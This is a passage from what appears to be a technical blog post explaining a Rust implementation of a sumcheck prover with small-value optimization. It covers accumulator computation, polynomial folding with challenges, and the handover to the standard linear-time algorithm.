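/// Evaluations of eq(w; x) for all x in {0,1}^k, in lexicographic order:
/// the first coordinate of w corresponds to the most significant index bit,
/// matching the index layout used throughout the post.
fn eval_eq_in_hypercube(w: &[u64]) -> Vec<u64> {
    let mut evals = vec![1u64];
    for &wi in w {
        let mut next = Vec::with_capacity(2 * evals.len());
        for &e in &evals {
            next.push(mul(e, one_minus(wi))); // branch x_i = 0 picks up (1 - w_i)
            next.push(mul(e, wi)); // branch x_i = 1 picks up w_i
        }
        evals = next;
    }
    evals
}
```

&lt;p&gt;For a Boolean point the result is an indicator vector, and for any point the evaluations sum to $1$, two handy sanity checks.&lt;&#x2F;p&gt;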
&lt;p&gt;Once we have computed these values, we can return to our &lt;code&gt;compute_accumulators&lt;&#x2F;code&gt; function.&lt;&#x2F;p&gt;
&lt;p&gt;The first thing we do is compute the number of variables in $x_{\mathrm{out}}$ as $\ell&#x2F;2 - \ell_0$, where $\ell$ is the number of variables of $p(X)$ and $\ell_0$ is the number of SVO rounds, taking into account the case where $\ell$ is odd.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;[...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let l = poly.num_variables();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let half_l = l &#x2F; 2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x_out_num_vars = half_l - NUM_SVO_ROUNDS + (l % 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x_num_vars = l - NUM_SVO_ROUNDS;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    debug_assert_eq!(half_l + x_out_num_vars, x_num_vars);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let poly_evals = poly.as_slice();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Now we can run the outer loop, where for each value of $x_{\mathrm{out}}$ we will:&lt;&#x2F;p&gt;
&lt;p&gt;1. Initialize the temporary accumulators and compute the number of variables in $x_{\mathrm{in}}$:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;(0..1 &amp;lt;&amp;lt; x_out_num_vars)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .into_par_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|x_out| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Each thread will compute its own set of local accumulators.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; This avoids mutable state sharing and the need for locks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut local_accumulators = Accumulators::&amp;lt;EF&amp;gt;::new_empty();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let mut temp_accumulators = [EF::ZERO; 1 &amp;lt;&amp;lt; NUM_SVO_ROUNDS];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let num_x_in = 1 &amp;lt;&amp;lt; half_l;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;2. For each value of $x_{\mathrm{in}}$, we compute the $\mathrm{tA}$ values using:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\mathrm{tA}[\beta] =&lt;br &#x2F;&gt;
\sum_{x_{\mathrm{in}} \in \{0,1 \}^{\ell&#x2F;2}}&lt;br &#x2F;&gt;
E_{\mathrm{in}}[x_{\mathrm{in}}] \cdot p(\beta, x_{\mathrm{in}}, x_{\mathrm{out}}),&lt;br &#x2F;&gt;
\quad \text{for each } \beta \in \{0,1 \}^{3}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for (x_in, &amp;amp;e_in_value) in e_in.iter().enumerate().take(num_x_in) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                &#x2F;&#x2F; For each beta in {0,1}^3, we update tA(beta) += e_in[x_in] * p(beta, x_in, x_out)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                #[allow(clippy::needless_range_loop)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                for i in 0..(1 &amp;lt;&amp;lt; NUM_SVO_ROUNDS) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let beta = i &amp;lt;&amp;lt; x_num_vars;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let index = beta | (x_in &amp;lt;&amp;lt; x_out_num_vars) | x_out; &#x2F;&#x2F; beta | x_in | x_out&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    temp_accumulators[i] += e_in_value * poly_evals[index]; &#x2F;&#x2F; += e_in[x_in] * p(beta, x_in, x_out)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;3. Once we have all the temporary accumulators, we unpack them and collect all the $E_{\mathrm{out}}$ values we will need.&lt;&#x2F;p&gt;
&lt;p&gt;Remember that, for a fixed $x_{\mathrm{out}}$, $E_{\mathrm{out}}$ depends only on $y$. In the first round, $y$ has 2 variables, giving us 4 possible $E_{\mathrm{out}}$ values. In the second round, $y$ has 1 variable, so there are 2 possible values. In the third round, $E_{\mathrm{out}}$ does not depend on $y$ at all, so there is a single value.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Destructure things since we will access them many times later&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let [t0, t1, t2, t3, t4, t5, t6, t7] = temp_accumulators;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Get E_out(y, x_out) for this x_out&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Round 0 (i=0) -&amp;gt; y=(b1,b2) -&amp;gt; 2 bits&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e0_0 = e_out[0][x_out]; &#x2F;&#x2F; y=00&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e0_1 = e_out[0][(1 &amp;lt;&amp;lt; x_out_num_vars) | x_out]; &#x2F;&#x2F; y=01&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e0_2 = e_out[0][(2 &amp;lt;&amp;lt; x_out_num_vars) | x_out]; &#x2F;&#x2F; y=10&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e0_3 = e_out[0][(3 &amp;lt;&amp;lt; x_out_num_vars) | x_out]; &#x2F;&#x2F; y=11&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Round 1 (i=1) -&amp;gt; y=(b2) -&amp;gt; 1 bit&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e1_0 = e_out[1][x_out]; &#x2F;&#x2F; y=0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e1_1 = e_out[1][(1 &amp;lt;&amp;lt; x_out_num_vars) | x_out]; &#x2F;&#x2F; y=1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Round 2 (i=2) -&amp;gt; y=() -&amp;gt; 0 bits&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let e2 = e_out[2][x_out]; &#x2F;&#x2F; y=()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;4. Once we have all these values, we can start adding them to the corresponding accumulators. In &lt;em&gt;Procedure 9&lt;&#x2F;em&gt;, this is done by iterating over $(i, v, u, y) \in \mathrm{idx4}(\beta)$, but since we only need to compute 3 rounds and the values for $u = 0$ and $u = 1$, we can do it directly using the following sum:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\sum_{\beta \in U_d^{\ell_0}}&lt;br &#x2F;&gt;
\sum_{\substack{(i^\prime, v^\prime, u^\prime, y) \in \mathrm{idx4}(\beta) \\ i^\prime = i,\ v^\prime = v,\ u^\prime = u}}&lt;br &#x2F;&gt;
E_{\mathrm{out}, i^\prime}[y, x_{\mathrm{out}}] \cdot \mathrm{tA}[\beta]&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Round 0 (i=0)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; A_0(u=0) = Σ_{y} E_out_0(y) * tA( (u=0, y), x_out )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(0, 0, e0_0 * t0 + e0_1 * t1 + e0_2 * t2 + e0_3 * t3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; A_0(u=1) = Σ_{y} E_out_0(y) * tA( (u=1, y), x_out )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(0, 1, e0_0 * t4 + e0_1 * t5 + e0_2 * t6 + e0_3 * t7);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; Round 1 (i=1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; A_1(v, u) = Σ_{y} E_out_1(y) * tA( (v, u, y), x_out )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; v=0, u=0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(1, 0, e1_0 * t0 + e1_1 * t1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; v=0, u=1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(1, 1, e1_0 * t2 + e1_1 * t3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; v=1, u=0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(1, 2, e1_0 * t4 + e1_1 * t5);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; v=1, u=1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     local_accumulators.accumulate(1, 3, e1_0 * t6 + e1_1 * t7);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; Round 2 (i=2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     &#x2F;&#x2F; A_2(v, u) = E_out_2() * tA( (v, u), x_out )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     #[allow(clippy::needless_range_loop)]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     for i in 0..8 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;          local_accumulators.accumulate(2, i, e2 * temp_accumulators[i]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Finally, the only thing left is to perform the sum over $x_{\mathrm{out}}$ across all threads.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;.par_fold_reduce(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            || Accumulators::&amp;lt;EF&amp;gt;::new_empty(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            |a, b| a + b,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            |a, b| a + b,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        )&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;v-phase-2-the-switchover-to-algorithm-5&quot;&gt;V. Phase 2: The Switchover to Algorithm 5&lt;&#x2F;h2&gt;
&lt;p&gt;The switchover strategy is critical. SVO is only cheaper for the first few rounds. That’s why after the first three rounds, we need to “apply” the challenges we’ve collected to the remaining polynomial evaluations. This process is formally known as &lt;strong&gt;folding&lt;&#x2F;strong&gt; or partial evaluation. We transform our original polynomial $p(x_1, \dots, x_\ell)$ into a smaller polynomial $p^{(3)}(x_4, \dots, x_\ell)$ by binding the first three variables:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
p^{(3)} (x_4, \dots, x_\ell) =&lt;br &#x2F;&gt;
\sum_{b \in \{0,1 \}^3} \mathrm{eq}\left((r_1, r_2, r_3), b\right) \cdot p(b, x_4, \dots, x_\ell)&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;The polynomial folding is done in the following line:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Fold to obtain p(r1, r2, r3, x)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut folded_evals = fold_evals_with_challenges(evals, &amp;amp;challenges); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This operation contracts our evaluation domain from $2^\ell$ down to $2^{\ell - 3}$. In our implementation the function &lt;code&gt;fold_evals_with_challenges&lt;&#x2F;code&gt; handles this folding operation in parallel.&lt;&#x2F;p&gt;
&lt;p&gt;Since multilinear evaluations are stored in lexicographic order, fixing the first 3 variables conceptually slices the hypercube into $2^3 = 8$ large contiguous blocks. To compute the value for a point $i$ in the new, smaller domain, we need to gather the value at offset $i$ from each of these 8 blocks.&lt;&#x2F;p&gt;
&lt;p&gt;The index logic &lt;code&gt;(j * num_remaining_evals) + i&lt;&#x2F;code&gt; allows us to jump to the correct block $j$ and access the specific element $i$, accumulating the weighted sum into the result.&lt;&#x2F;p&gt;
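&lt;p&gt;To see this index arithmetic in action, here is a toy sequential version of the fold over integers modulo a small prime; the modulus, the sequential loops, and the function name &lt;code&gt;fold_first_k&lt;&#x2F;code&gt; are our simplifying assumptions, not the repo’s code:&lt;&#x2F;p&gt;

```rust
// Toy prime modulus (assumption: stands in for the real base/extension fields).
const P: u64 = 101;

fn mul(a: u64, b: u64) -> u64 {
    a * b % P
}

/// eq(r; b) for a single variable b in {0, 1}: (1 - r) if b = 0, r if b = 1.
fn eq1(r: u64, b: u64) -> u64 {
    if b == 0 { (1 + P - r) % P } else { r }
}

/// Fold out the first k variables of a multilinear evaluation table stored in
/// lexicographic order (first variable = most significant index bit).
fn fold_first_k(evals: &[u64], challenges: &[u64]) -> Vec<u64> {
    let k = challenges.len();
    let num_remaining_evals = evals.len() >> k;
    // Weights eq(r, j) for each of the 2^k prefixes j.
    let eq_evals: Vec<u64> = (0..(1usize << k))
        .map(|j| {
            (0..k).fold(1u64, |acc, t| {
                let bit = ((j >> (k - 1 - t)) & 1) as u64;
                mul(acc, eq1(challenges[t], bit))
            })
        })
        .collect();
    // For each point i of the smaller domain, gather offset i from each block j.
    (0..num_remaining_evals)
        .map(|i| {
            eq_evals.iter().enumerate().fold(0u64, |acc, (j, &eq_val)| {
                (acc + mul(eq_val, evals[j * num_remaining_evals + i])) % P
            })
        })
        .collect()
}
```

&lt;p&gt;For example, folding the table $[1, 2, 3, 4]$ of a 2-variable multilinear $p$ with the single challenge $r_1 = 5$ yields $[11, 12]$, which matches evaluating $p(5, x_2)$ at $x_2 \in \{0, 1\}$ directly.&lt;&#x2F;p&gt;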
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn fold_evals_with_challenges&amp;lt;F, EF&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    evals: &amp;amp;EvaluationsList&amp;lt;F&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges: &amp;amp;[EF],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; EvaluationsList&amp;lt;EF&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let n = evals.num_vars();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let k = challenges.len(); &#x2F;&#x2F; k = 3 in our case&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; The size of the new, smaller hypercube (2^{l-3})&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let num_remaining_evals = 1 &amp;lt;&amp;lt; (n - k); &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 1. Precompute weights eq(r, b) for all 8 prefixes b in {0,1}^3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let eq_evals: Vec&amp;lt;EF&amp;gt; = eval_eq_in_hypercube(challenges);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 2. Parallel Fold&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let folded_evals_flat: Vec&amp;lt;EF&amp;gt; = (0..num_remaining_evals)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .into_par_iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .map(|i| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;             &#x2F;&#x2F; For each point &amp;#39;i&amp;#39; in the destination domain, sum over the 8 source prefixes.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            eq_evals&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .enumerate()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .fold(EF::ZERO, |acc, (j, &amp;amp;eq_val)| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    &#x2F;&#x2F; Reconstruct the index: prefix (j) + suffix (i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let original_eval_index = (j * num_remaining_evals) + i;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    let p_b_x = evals.as_slice()[original_eval_index];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    acc + eq_val * p_b_x&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        })&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .collect();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    EvaluationsList::new(folded_evals_flat)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;the-svo-to-standard-handover&quot;&gt;The SVO-to-Standard Handover&lt;&#x2F;h3&gt;
&lt;p&gt;Why do we stop SVO exactly here? The decision is dictated by the cost of field multiplications, as analyzed in the paper:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Before Folding ($\mathfrak{ss}$ Regime):&lt;&#x2F;strong&gt; our polynomial evaluations are in the base field (small). SVO exploits this by using efficient interpolation on small values, avoiding expensive extension field arithmetic.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;The Folding Operation:&lt;&#x2F;strong&gt; the fold itself is a linear combination involving the challenges $r_i$. Since $r_i \in \mathbb{F}_{\text{ext}}$, the output of the fold must be in the extension field.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;After Folding ($\mathfrak{ll}$ Regime):&lt;&#x2F;strong&gt; once our evaluations are promoted to the extension field, the benefits of SVO evaporate: the $\mathcal{O}(d^2)$ overhead SVO introduces to save on multiplications no longer pays off.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;After three rounds, the folded multilinear polynomial is small enough that the standard linear-time prover (&lt;em&gt;Algorithm 5&lt;&#x2F;em&gt;) becomes more efficient than SVO. By switching immediately after the fold, we ensure that base field values are handled with SVO and extension field values with the standard approach, maintaining optimal performance across the entire protocol execution.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;algorithm-5&quot;&gt;Algorithm 5&lt;&#x2F;h3&gt;
&lt;p&gt;Once we have folded the polynomial, we proceed to use &lt;em&gt;Algorithm 5&lt;&#x2F;em&gt; to execute the remaining $\ell - \ell_0$ rounds. You’ll find our implementation in the function called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&#x2F;blob&#x2F;eec71d03a5ec81f30acc6d591f42f318941c6df5&#x2F;src&#x2F;sumcheck&#x2F;sumcheck_small_value.rs#L402&quot;&gt;&lt;code&gt;algorithm_5&lt;&#x2F;code&gt;&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn algorithm_5&amp;lt;Challenger, F: Field, EF: ExtensionField&amp;lt;F&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prover_state: &amp;amp;mut ProverState&amp;lt;F, EF, Challenger&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    poly: &amp;amp;mut EvaluationsList&amp;lt;EF&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    w: &amp;amp;MultilinearPoint&amp;lt;EF&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
